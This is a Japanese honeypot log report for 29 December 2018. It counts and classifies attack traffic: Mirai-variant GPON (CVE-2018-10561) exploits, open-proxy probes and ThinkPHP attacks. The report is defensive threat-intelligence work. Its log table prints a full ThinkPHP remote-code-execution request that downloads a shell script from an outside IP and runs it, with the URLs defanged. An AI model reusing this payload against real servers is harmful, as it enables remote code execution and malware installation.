ハニーポットのログ分析(2018/12/29)
WOWhoneypotの2018/12/29(土) (運用206日目)の簡易分析です。
本日の総アクセス件数は 51件です。
本日の主なアクセスは以下です。
・GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:3件
・不正中継の調査:9件
・ThinkPHPの脆弱性を突いた攻撃:2件
本日のドメイン名でのアクセスは以下です。
3 GET /
1 GET /robots.txt
本日のハンティングログは以下です。ThinkPHPを狙ったものです。
2 2018-12-29 wget hxxp://205.185.113[.]123/ex.sh
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 35 | 2018-12-29 | アクセス | GET / |
| 3 | 2018-12-29 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
| 3 | 2018-12-29 | 不正中継の調査 | CONNECT www.baidu.com:443 |
| 2 | 2018-12-29 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=cd%20/tmp;wget%20hxxp://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh |
| 2 | 2018-12-29 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
| 1 | 2018-12-29 | クローリング | GET /robots.txt |
| 1 | 2018-12-29 | phpMyAdminの調査 | GET /pmd/ |
| 1 | 2018-12-29 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
| 1 | 2018-12-29 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
| 1 | 2018-12-29 | 不正中継の調査 | GET hxxp://api.ipify.org/ |
| 1 | 2018-12-29 | 不正中継の調査 | CONNECT cn.bing.com:443 |
以上です。
